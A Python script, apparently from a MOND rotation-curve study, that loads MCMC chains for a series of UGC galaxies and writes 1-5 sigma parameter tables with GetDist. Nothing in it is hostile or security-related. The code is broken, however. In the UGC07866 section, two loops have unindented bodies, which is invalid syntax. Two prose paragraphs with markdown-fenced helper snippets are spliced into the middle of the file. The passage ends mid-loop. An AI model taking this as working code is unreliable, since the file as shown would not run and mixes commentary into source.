for par, sol in (('log10_a0', log10_a0_sol_UGC07399), ('log10_YD', log10_YD_sol_UGC07399), ('df2', df2_sol_UGC07399), ('Dinc', Dinc_sol_UGC07399)):
    limits = stats_UGC07399.parWithName(par).limits
    with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07399-sigmatab-%s.txt' % par, 'w') as text_file:
        text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
        for i in range(5):
            text_file.write('%s,%s,%s\n' % (sol, sol - limits[i].lower, limits[i].upper - sol))
full_chain_UGC07524 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC07524.csv', usecols=[1, 2, 3, 4])
data_array_chain_UGC07524 = numpy.array(full_chain_UGC07524)
mle_soln_UGC07524 = []
for i in range(ndim):
    mcmc_UGC07524 = numpy.percentile(data_array_chain_UGC07524[:, i], [16, 50, 84])
    q_UGC07524 = numpy.diff(mcmc_UGC07524)  # 16-50 and 50-84 spreads (unused below)
    mle_soln_UGC07524.append(mcmc_UGC07524[1])  # marginalized median of parameter i
log10_a0_sol_UGC07524 = mle_soln_UGC07524[0]
log10_YD_sol_UGC07524 = mle_soln_UGC07524[1]
df2_sol_UGC07524 = mle_soln_UGC07524[2]
Dinc_sol_UGC07524 = mle_soln_UGC07524[3]
samp_UGC07524 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC07524, names=names, labels=labels)
samp_UGC07524.updateSettings({'contours': [0.682689492137086, 0.954499736103642, 0.997300203936740, 0.999936657516334, 0.999999426696856]})
stats_UGC07524 = samp_UGC07524.getMargeStats()
# One sigma-table file per parameter; rows give the 1-5 sigma offsets below/above the median.
for par, sol in (('log10_a0', log10_a0_sol_UGC07524), ('log10_YD', log10_YD_sol_UGC07524), ('df2', df2_sol_UGC07524), ('Dinc', Dinc_sol_UGC07524)):
    limits = stats_UGC07524.parWithName(par).limits
    with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07524-sigmatab-%s.txt' % par, 'w') as text_file:
        text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
        for i in range(5):
            text_file.write('%s,%s,%s\n' % (sol, sol - limits[i].lower, limits[i].upper - sol))
full_chain_UGC07559 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC07559.csv', usecols=[1, 2, 3, 4])
data_array_chain_UGC07559 = numpy.array(full_chain_UGC07559)
mle_soln_UGC07559 = []
for i in range(ndim):
    mcmc_UGC07559 = numpy.percentile(data_array_chain_UGC07559[:, i], [16, 50, 84])
    q_UGC07559 = numpy.diff(mcmc_UGC07559)  # 16-50 and 50-84 spreads (unused below)
    mle_soln_UGC07559.append(mcmc_UGC07559[1])  # marginalized median of parameter i
log10_a0_sol_UGC07559 = mle_soln_UGC07559[0]
log10_YD_sol_UGC07559 = mle_soln_UGC07559[1]
df2_sol_UGC07559 = mle_soln_UGC07559[2]
Dinc_sol_UGC07559 = mle_soln_UGC07559[3]
samp_UGC07559 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC07559, names=names, labels=labels)
samp_UGC07559.updateSettings({'contours': [0.682689492137086, 0.954499736103642, 0.997300203936740, 0.999936657516334, 0.999999426696856]})
stats_UGC07559 = samp_UGC07559.getMargeStats()
# One sigma-table file per parameter; rows give the 1-5 sigma offsets below/above the median.
for par, sol in (('log10_a0', log10_a0_sol_UGC07559), ('log10_YD', log10_YD_sol_UGC07559), ('df2', df2_sol_UGC07559), ('Dinc', Dinc_sol_UGC07559)):
    limits = stats_UGC07559.parWithName(par).limits
    with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07559-sigmatab-%s.txt' % par, 'w') as text_file:
        text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
        for i in range(5):
            text_file.write('%s,%s,%s\n' % (sol, sol - limits[i].lower, limits[i].upper - sol))
full_chain_UGC07577 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC07577.csv', usecols=[1, 2, 3, 4])
data_array_chain_UGC07577 = numpy.array(full_chain_UGC07577)
mle_soln_UGC07577 = []
for i in range(ndim):
    mcmc_UGC07577 = numpy.percentile(data_array_chain_UGC07577[:, i], [16, 50, 84])
    q_UGC07577 = numpy.diff(mcmc_UGC07577)  # 16-50 and 50-84 spreads (unused below)
    mle_soln_UGC07577.append(mcmc_UGC07577[1])  # marginalized median of parameter i
log10_a0_sol_UGC07577 = mle_soln_UGC07577[0]
log10_YD_sol_UGC07577 = mle_soln_UGC07577[1]
df2_sol_UGC07577 = mle_soln_UGC07577[2]
Dinc_sol_UGC07577 = mle_soln_UGC07577[3]
samp_UGC07577 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC07577, names=names, labels=labels)
samp_UGC07577.updateSettings({'contours': [0.682689492137086, 0.954499736103642, 0.997300203936740, 0.999936657516334, 0.999999426696856]})
stats_UGC07577 = samp_UGC07577.getMargeStats()
# One sigma-table file per parameter; rows give the 1-5 sigma offsets below/above the median.
for par, sol in (('log10_a0', log10_a0_sol_UGC07577), ('log10_YD', log10_YD_sol_UGC07577), ('df2', df2_sol_UGC07577), ('Dinc', Dinc_sol_UGC07577)):
    limits = stats_UGC07577.parWithName(par).limits
    with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07577-sigmatab-%s.txt' % par, 'w') as text_file:
        text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
        for i in range(5):
            text_file.write('%s,%s,%s\n' % (sol, sol - limits[i].lower, limits[i].upper - sol))
full_chain_UGC07603 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC07603.csv', usecols=[1, 2, 3, 4])
data_array_chain_UGC07603 = numpy.array(full_chain_UGC07603)
mle_soln_UGC07603 = []
for i in range(ndim):
    mcmc_UGC07603 = numpy.percentile(data_array_chain_UGC07603[:, i], [16, 50, 84])
    q_UGC07603 = numpy.diff(mcmc_UGC07603)  # 16-50 and 50-84 spreads (unused below)
    mle_soln_UGC07603.append(mcmc_UGC07603[1])  # marginalized median of parameter i
log10_a0_sol_UGC07603 = mle_soln_UGC07603[0]
log10_YD_sol_UGC07603 = mle_soln_UGC07603[1]
df2_sol_UGC07603 = mle_soln_UGC07603[2]
Dinc_sol_UGC07603 = mle_soln_UGC07603[3]
samp_UGC07603 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC07603, names=names, labels=labels)
samp_UGC07603.updateSettings({'contours': [0.682689492137086, 0.954499736103642, 0.997300203936740, 0.999936657516334, 0.999999426696856]})
stats_UGC07603 = samp_UGC07603.getMargeStats()
# One sigma-table file per parameter; rows give the 1-5 sigma offsets below/above the median.
for par, sol in (('log10_a0', log10_a0_sol_UGC07603), ('log10_YD', log10_YD_sol_UGC07603), ('df2', df2_sol_UGC07603), ('Dinc', Dinc_sol_UGC07603)):
    limits = stats_UGC07603.parWithName(par).limits
    with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07603-sigmatab-%s.txt' % par, 'w') as text_file:
        text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
        for i in range(5):
            text_file.write('%s,%s,%s\n' % (sol, sol - limits[i].lower, limits[i].upper - sol))
full_chain_UGC07690 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC07690.csv', usecols=[1, 2, 3, 4])
data_array_chain_UGC07690 = numpy.array(full_chain_UGC07690)
mle_soln_UGC07690 = []
for i in range(ndim):
    mcmc_UGC07690 = numpy.percentile(data_array_chain_UGC07690[:, i], [16, 50, 84])
    q_UGC07690 = numpy.diff(mcmc_UGC07690)  # 16-50 and 50-84 spreads (unused below)
    mle_soln_UGC07690.append(mcmc_UGC07690[1])  # marginalized median of parameter i
log10_a0_sol_UGC07690 = mle_soln_UGC07690[0]
log10_YD_sol_UGC07690 = mle_soln_UGC07690[1]
df2_sol_UGC07690 = mle_soln_UGC07690[2]
Dinc_sol_UGC07690 = mle_soln_UGC07690[3]
samp_UGC07690 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC07690, names=names, labels=labels)
samp_UGC07690.updateSettings({'contours': [0.682689492137086, 0.954499736103642, 0.997300203936740, 0.999936657516334, 0.999999426696856]})
stats_UGC07690 = samp_UGC07690.getMargeStats()
# One sigma-table file per parameter; rows give the 1-5 sigma offsets below/above the median.
for par, sol in (('log10_a0', log10_a0_sol_UGC07690), ('log10_YD', log10_YD_sol_UGC07690), ('df2', df2_sol_UGC07690), ('Dinc', Dinc_sol_UGC07690)):
    limits = stats_UGC07690.parWithName(par).limits
    with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07690-sigmatab-%s.txt' % par, 'w') as text_file:
        text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
        for i in range(5):
            text_file.write('%s,%s,%s\n' % (sol, sol - limits[i].lower, limits[i].upper - sol))
full_chain_UGC07866 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC07866.csv', usecols=[1, 2, 3, 4])
data_array_chain_UGC07866 = numpy.array(full_chain_UGC07866)
mle_soln_UGC07866 = []
for i in range(ndim):
    mcmc_UGC07866 = numpy.percentile(data_array_chain_UGC07866[:, i], [16, 50, 84])
    q_UGC07866 = numpy.diff(mcmc_UGC07866)  # 16-50 and 50-84 spreads (unused below)
    mle_soln_UGC07866.append(mcmc_UGC07866[1])  # marginalized median of parameter i
log10_a0_sol_UGC07866 = mle_soln_UGC07866[0]
log10_YD_sol_UGC07866 = mle_soln_UGC07866[1]
df2_sol_UGC07866 = mle_soln_UGC07866[2]
Dinc_sol_UGC07866 = mle_soln_UGC07866[3]
samp_UGC07866 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC07866, names=names, labels=labels)
samp_UGC07866.updateSettings({'contours': [0.682689492137086, 0.954499736103642, 0.997300203936740, 0.999936657516334, 0.999999426696856]})
stats_UGC07866 = samp_UGC07866.getMargeStats()
# Sigma-table files for the first two parameters; rows give the 1-5 sigma offsets below/above the median.
for par, sol in (('log10_a0', log10_a0_sol_UGC07866), ('log10_YD', log10_YD_sol_UGC07866)):
    limits = stats_UGC07866.parWithName(par).limits
    with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07866-sigmatab-%s.txt' % par, 'w') as text_file:
        text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
        for i in range(5):
            text_file.write('%s,%s,%s\n' % (sol, sol - limits[i].lower, limits[i].upper - sol))
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07866-sigmatab-df2.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
df2_sol_str='%s'%df2_sol_UGC07866
low=df2_sol_UGC07866-stats_UGC07866.parWithName('df2').limits[i].lower
low_str='%s'%low
up=stats_UGC07866.parWithName('df2').limits[i].upper- df2_sol_UGC07866
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07866-sigmatab-df2.txt', 'a')
text_file.write(df2_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07866-sigmatab-Dinc.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
Dinc_sol_str='%s'%Dinc_sol_UGC07866
low=Dinc_sol_UGC07866-stats_UGC07866.parWithName('Dinc').limits[i].lower
low_str='%s'%low
up=stats_UGC07866.parWithName('Dinc').limits[i].upper- Dinc_sol_UGC07866
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07866-sigmatab-Dinc.txt', 'a')
text_file.write(Dinc_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
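Every sigma table above repeats the same open/write/close pattern per parameter and per galaxy. A minimal sketch of how that pattern could be factored into one helper (the name `write_sigma_table` and the plain `(lower, upper)` pairs are hypothetical stand-ins for GetDist's `parWithName(...).limits` entries):

```python
def write_sigma_table(path, sol, limits):
    """Write one 'max,s-,s+' sigma table: a header line, then one row
    per confidence level, in the same format as the files above."""
    with open(path, 'w') as f:
        f.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
        for lower, upper in limits:
            # distance from the best-fit value down to the lower bound
            # and up to the upper bound, formatted with '%s' as above
            f.write('%s,%s,%s\n' % (sol, sol - lower, upper - sol))
```

One call per parameter, e.g. `write_sigma_table(out_path, log10_a0_sol_UGC07866, [(l.lower, l.upper) for l in stats_UGC07866.parWithName('log10_a0').limits])`, could then replace each repeated block.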
full_chain_UGC08286 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC08286.csv', usecols=[1, 2, 3, 4])
data_array_chain_UGC08286 = numpy.array(full_chain_UGC08286)
mle_soln_UGC08286 = []
for i in range(ndim):
    mcmc_UGC08286 = numpy.percentile(data_array_chain_UGC08286[:, i], [16, 50, 84])
    q_UGC08286 = numpy.diff(mcmc_UGC08286)
    mle_soln_UGC08286.append(mcmc_UGC08286[1])
log10_a0_sol_UGC08286 = mle_soln_UGC08286[0]
log10_YD_sol_UGC08286 = mle_soln_UGC08286[1]
df2_sol_UGC08286 = mle_soln_UGC08286[2]
Dinc_sol_UGC08286 = mle_soln_UGC08286[3]
samp_UGC08286 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC08286, names=names, labels=labels)
samp_UGC08286.updateSettings({'contours': [0.682689492137086, 0.954499736103642, 0.997300203936740, 0.999936657516334, 0.999999426696856]})
stats_UGC08286 = samp_UGC08286.getMargeStats()
with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08286-sigmatab-log10_a0.txt', 'w') as text_file:
    text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
    for i in range(5):
        low = log10_a0_sol_UGC08286 - stats_UGC08286.parWithName('log10_a0').limits[i].lower
        up = stats_UGC08286.parWithName('log10_a0').limits[i].upper - log10_a0_sol_UGC08286
        text_file.write('%s,%s,%s\n' % (log10_a0_sol_UGC08286, low, up))
with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08286-sigmatab-log10_YD.txt', 'w') as text_file:
    text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
    for i in range(5):
        low = log10_YD_sol_UGC08286 - stats_UGC08286.parWithName('log10_YD').limits[i].lower
        up = stats_UGC08286.parWithName('log10_YD').limits[i].upper - log10_YD_sol_UGC08286
        text_file.write('%s,%s,%s\n' % (log10_YD_sol_UGC08286, low, up))
with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08286-sigmatab-df2.txt', 'w') as text_file:
    text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
    for i in range(5):
        low = df2_sol_UGC08286 - stats_UGC08286.parWithName('df2').limits[i].lower
        up = stats_UGC08286.parWithName('df2').limits[i].upper - df2_sol_UGC08286
        text_file.write('%s,%s,%s\n' % (df2_sol_UGC08286, low, up))
with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08286-sigmatab-Dinc.txt', 'w') as text_file:
    text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
    for i in range(5):
        low = Dinc_sol_UGC08286 - stats_UGC08286.parWithName('Dinc').limits[i].lower
        up = stats_UGC08286.parWithName('Dinc').limits[i].upper - Dinc_sol_UGC08286
        text_file.write('%s,%s,%s\n' % (Dinc_sol_UGC08286, low, up))
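The per-galaxy percentile loops above each keep only the 50th percentile of every chain column (the `q_*` diffs are computed but not used afterwards). A small sketch of that median extraction as a reusable function (`chain_medians` is a hypothetical helper name, not part of the original script):

```python
import numpy

def chain_medians(samples):
    """Column-wise medians of a chain array shaped (n_samples, n_params),
    i.e. the value each mle_soln_* loop above keeps per parameter."""
    return [numpy.percentile(samples[:, i], 50) for i in range(samples.shape[1])]
```

For example, `mle_soln_UGC08286 = chain_medians(data_array_chain_UGC08286)` could replace one explicit loop.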
full_chain_UGC08490 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC08490.csv', usecols=[1, 2, 3, 4])
data_array_chain_UGC08490 = numpy.array(full_chain_UGC08490)
mle_soln_UGC08490 = []
for i in range(ndim):
    mcmc_UGC08490 = numpy.percentile(data_array_chain_UGC08490[:, i], [16, 50, 84])
    q_UGC08490 = numpy.diff(mcmc_UGC08490)
    mle_soln_UGC08490.append(mcmc_UGC08490[1])
log10_a0_sol_UGC08490 = mle_soln_UGC08490[0]
log10_YD_sol_UGC08490 = mle_soln_UGC08490[1]
df2_sol_UGC08490 = mle_soln_UGC08490[2]
Dinc_sol_UGC08490 = mle_soln_UGC08490[3]
samp_UGC08490 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC08490, names=names, labels=labels)
samp_UGC08490.updateSettings({'contours': [0.682689492137086, 0.954499736103642, 0.997300203936740, 0.999936657516334, 0.999999426696856]})
stats_UGC08490 = samp_UGC08490.getMargeStats()
with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08490-sigmatab-log10_a0.txt', 'w') as text_file:
    text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
    for i in range(5):
        low = log10_a0_sol_UGC08490 - stats_UGC08490.parWithName('log10_a0').limits[i].lower
        up = stats_UGC08490.parWithName('log10_a0').limits[i].upper - log10_a0_sol_UGC08490
        text_file.write('%s,%s,%s\n' % (log10_a0_sol_UGC08490, low, up))
with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08490-sigmatab-log10_YD.txt', 'w') as text_file:
    text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
    for i in range(5):
        low = log10_YD_sol_UGC08490 - stats_UGC08490.parWithName('log10_YD').limits[i].lower
        up = stats_UGC08490.parWithName('log10_YD').limits[i].upper - log10_YD_sol_UGC08490
        text_file.write('%s,%s,%s\n' % (log10_YD_sol_UGC08490, low, up))
with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08490-sigmatab-df2.txt', 'w') as text_file:
    text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
    for i in range(5):
        low = df2_sol_UGC08490 - stats_UGC08490.parWithName('df2').limits[i].lower
        up = stats_UGC08490.parWithName('df2').limits[i].upper - df2_sol_UGC08490
        text_file.write('%s,%s,%s\n' % (df2_sol_UGC08490, low, up))
with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08490-sigmatab-Dinc.txt', 'w') as text_file:
    text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
    for i in range(5):
        low = Dinc_sol_UGC08490 - stats_UGC08490.parWithName('Dinc').limits[i].lower
        up = stats_UGC08490.parWithName('Dinc').limits[i].upper - Dinc_sol_UGC08490
        text_file.write('%s,%s,%s\n' % (Dinc_sol_UGC08490, low, up))
full_chain_UGC08550 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC08550.csv', usecols=[1, 2, 3, 4])
data_array_chain_UGC08550 = numpy.array(full_chain_UGC08550)
mle_soln_UGC08550 = []
for i in range(ndim):
    mcmc_UGC08550 = numpy.percentile(data_array_chain_UGC08550[:, i], [16, 50, 84])
    q_UGC08550 = numpy.diff(mcmc_UGC08550)
    mle_soln_UGC08550.append(mcmc_UGC08550[1])
log10_a0_sol_UGC08550 = mle_soln_UGC08550[0]
log10_YD_sol_UGC08550 = mle_soln_UGC08550[1]
df2_sol_UGC08550 = mle_soln_UGC08550[2]
Dinc_sol_UGC08550 = mle_soln_UGC08550[3]
samp_UGC08550 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC08550, names=names, labels=labels)
samp_UGC08550.updateSettings({'contours': [0.682689492137086, 0.954499736103642, 0.997300203936740, 0.999936657516334, 0.999999426696856]})
stats_UGC08550 = samp_UGC08550.getMargeStats()
with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08550-sigmatab-log10_a0.txt', 'w') as text_file:
    text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
    for i in range(5):
        low = log10_a0_sol_UGC08550 - stats_UGC08550.parWithName('log10_a0').limits[i].lower
        up = stats_UGC08550.parWithName('log10_a0').limits[i].upper - log10_a0_sol_UGC08550
        text_file.write('%s,%s,%s\n' % (log10_a0_sol_UGC08550, low, up))
with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08550-sigmatab-log10_YD.txt', 'w') as text_file:
    text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
    for i in range(5):
        low = log10_YD_sol_UGC08550 - stats_UGC08550.parWithName('log10_YD').limits[i].lower
        up = stats_UGC08550.parWithName('log10_YD').limits[i].upper - log10_YD_sol_UGC08550
        text_file.write('%s,%s,%s\n' % (log10_YD_sol_UGC08550, low, up))
with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08550-sigmatab-df2.txt', 'w') as text_file:
    text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
    for i in range(5):
        low = df2_sol_UGC08550 - stats_UGC08550.parWithName('df2').limits[i].lower
        up = stats_UGC08550.parWithName('df2').limits[i].upper - df2_sol_UGC08550
        text_file.write('%s,%s,%s\n' % (df2_sol_UGC08550, low, up))
with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08550-sigmatab-Dinc.txt', 'w') as text_file:
    text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
    for i in range(5):
        low = Dinc_sol_UGC08550 - stats_UGC08550.parWithName('Dinc').limits[i].lower
        up = stats_UGC08550.parWithName('Dinc').limits[i].upper - Dinc_sol_UGC08550
        text_file.write('%s,%s,%s\n' % (Dinc_sol_UGC08550, low, up))
full_chain_UGC08699 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC08699.csv', usecols=[1, 2, 3, 4, 5])
data_array_chain_UGC08699 = numpy.array(full_chain_UGC08699)
mle_soln_UGC08699 = []
for i in range(ndim_with_bulge):
    mcmc_UGC08699 = numpy.percentile(data_array_chain_UGC08699[:, i], [16, 50, 84])
    q_UGC08699 = numpy.diff(mcmc_UGC08699)
    mle_soln_UGC08699.append(mcmc_UGC08699[1])
log10_a0_sol_UGC08699 = mle_soln_UGC08699[0]
log10_YD_sol_UGC08699 = mle_soln_UGC08699[1]
log10_YB_sol_UGC08699 = mle_soln_UGC08699[2]
df2_sol_UGC08699 = mle_soln_UGC08699[3]
Dinc_sol_UGC08699 = mle_soln_UGC08699[4]
samp_UGC08699 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC08699, names=names_with_bulge, labels=labels_with_bulge)
samp_UGC08699.updateSettings({'contours': [0.682689492137086, 0.954499736103642, 0.997300203936740, 0.999936657516334, 0.999999426696856]})
stats_UGC08699 = samp_UGC08699.getMargeStats()
with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08699-sigmatab-log10_a0.txt', 'w') as text_file:
    text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
    for i in range(5):
        low = log10_a0_sol_UGC08699 - stats_UGC08699.parWithName('log10_a0').limits[i].lower
        up = stats_UGC08699.parWithName('log10_a0').limits[i].upper - log10_a0_sol_UGC08699
        text_file.write('%s,%s,%s\n' % (log10_a0_sol_UGC08699, low, up))
with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08699-sigmatab-log10_YD.txt', 'w') as text_file:
    text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
    for i in range(5):
        low = log10_YD_sol_UGC08699 - stats_UGC08699.parWithName('log10_YD').limits[i].lower
        up = stats_UGC08699.parWithName('log10_YD').limits[i].upper - log10_YD_sol_UGC08699
        text_file.write('%s,%s,%s\n' % (log10_YD_sol_UGC08699, low, up))
with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08699-sigmatab-log10_YB.txt', 'w') as text_file:
    text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
    for i in range(5):
        low = log10_YB_sol_UGC08699 - stats_UGC08699.parWithName('log10_YB').limits[i].lower
        up = stats_UGC08699.parWithName('log10_YB').limits[i].upper - log10_YB_sol_UGC08699
        text_file.write('%s,%s,%s\n' % (log10_YB_sol_UGC08699, low, up))
with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08699-sigmatab-df2.txt', 'w') as text_file:
    text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
    for i in range(5):
        low = df2_sol_UGC08699 - stats_UGC08699.parWithName('df2').limits[i].lower
        up = stats_UGC08699.parWithName('df2').limits[i].upper - df2_sol_UGC08699
        text_file.write('%s,%s,%s\n' % (df2_sol_UGC08699, low, up))
with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08699-sigmatab-Dinc.txt', 'w') as text_file:
    text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
    for i in range(5):
        low = Dinc_sol_UGC08699 - stats_UGC08699.parWithName('Dinc').limits[i].lower
        up = stats_UGC08699.parWithName('Dinc').limits[i].upper - Dinc_sol_UGC08699
        text_file.write('%s,%s,%s\n' % (Dinc_sol_UGC08699, low, up))
full_chain_UGC08837 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC08837.csv', usecols=[1, 2, 3, 4])
data_array_chain_UGC08837 = numpy.array(full_chain_UGC08837)
mle_soln_UGC08837 = []
for i in range(ndim):
    mcmc_UGC08837 = numpy.percentile(data_array_chain_UGC08837[:, i], [16, 50, 84])
    q_UGC08837 = numpy.diff(mcmc_UGC08837)
    mle_soln_UGC08837.append(mcmc_UGC08837[1])
log10_a0_sol_UGC08837 = mle_soln_UGC08837[0]
log10_YD_sol_UGC08837 = mle_soln_UGC08837[1]
df2_sol_UGC08837 = mle_soln_UGC08837[2]
Dinc_sol_UGC08837 = mle_soln_UGC08837[3]
samp_UGC08837 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC08837, names=names, labels=labels)
samp_UGC08837.updateSettings({'contours': [0.682689492137086, 0.954499736103642, 0.997300203936740, 0.999936657516334, 0.999999426696856]})
stats_UGC08837 = samp_UGC08837.getMargeStats()
with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08837-sigmatab-log10_a0.txt', 'w') as text_file:
    text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
    for i in range(5):
        low = log10_a0_sol_UGC08837 - stats_UGC08837.parWithName('log10_a0').limits[i].lower
        up = stats_UGC08837.parWithName('log10_a0').limits[i].upper - log10_a0_sol_UGC08837
        text_file.write('%s,%s,%s\n' % (log10_a0_sol_UGC08837, low, up))
with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08837-sigmatab-log10_YD.txt', 'w') as text_file:
    text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
    for i in range(5):
        low = log10_YD_sol_UGC08837 - stats_UGC08837.parWithName('log10_YD').limits[i].lower
        up = stats_UGC08837.parWithName('log10_YD').limits[i].upper - log10_YD_sol_UGC08837
        text_file.write('%s,%s,%s\n' % (log10_YD_sol_UGC08837, low, up))
with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08837-sigmatab-df2.txt', 'w') as text_file:
    text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
    for i in range(5):
        low = df2_sol_UGC08837 - stats_UGC08837.parWithName('df2').limits[i].lower
        up = stats_UGC08837.parWithName('df2').limits[i].upper - df2_sol_UGC08837
        text_file.write('%s,%s,%s\n' % (df2_sol_UGC08837, low, up))
with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08837-sigmatab-Dinc.txt', 'w') as text_file:
    text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
    for i in range(5):
        low = Dinc_sol_UGC08837 - stats_UGC08837.parWithName('Dinc').limits[i].lower
        up = stats_UGC08837.parWithName('Dinc').limits[i].upper - Dinc_sol_UGC08837
        text_file.write('%s,%s,%s\n' % (Dinc_sol_UGC08837, low, up))
full_chain_UGC09037 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC09037.csv', usecols=[1, 2, 3, 4])
data_array_chain_UGC09037 = numpy.array(full_chain_UGC09037)
mle_soln_UGC09037 = []
for i in range(ndim):
    mcmc_UGC09037 = numpy.percentile(data_array_chain_UGC09037[:, i], [16, 50, 84])
    q_UGC09037 = numpy.diff(mcmc_UGC09037)
    mle_soln_UGC09037.append(mcmc_UGC09037[1])
log10_a0_sol_UGC09037 = mle_soln_UGC09037[0]
log10_YD_sol_UGC09037 = mle_soln_UGC09037[1]
df2_sol_UGC09037 = mle_soln_UGC09037[2]
Dinc_sol_UGC09037 = mle_soln_UGC09037[3]
samp_UGC09037 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC09037, names=names, labels=labels)
samp_UGC09037.updateSettings({'contours': [0.682689492137086, 0.954499736103642, 0.997300203936740, 0.999936657516334, 0.999999426696856]})
stats_UGC09037 = samp_UGC09037.getMargeStats()
with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC09037-sigmatab-log10_a0.txt', 'w') as text_file:
    text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
    for i in range(5):
        low = log10_a0_sol_UGC09037 - stats_UGC09037.parWithName('log10_a0').limits[i].lower
        up = stats_UGC09037.parWithName('log10_a0').limits[i].upper - log10_a0_sol_UGC09037
        text_file.write('%s,%s,%s\n' % (log10_a0_sol_UGC09037, low, up))
with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC09037-sigmatab-log10_YD.txt', 'w') as text_file:
    text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
    for i in range(5):
        low = log10_YD_sol_UGC09037 - stats_UGC09037.parWithName('log10_YD').limits[i].lower
        up = stats_UGC09037.parWithName('log10_YD').limits[i].upper - log10_YD_sol_UGC09037
        text_file.write('%s,%s,%s\n' % (log10_YD_sol_UGC09037, low, up))
with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC09037-sigmatab-df2.txt', 'w') as text_file:
    text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
    for i in range(5):
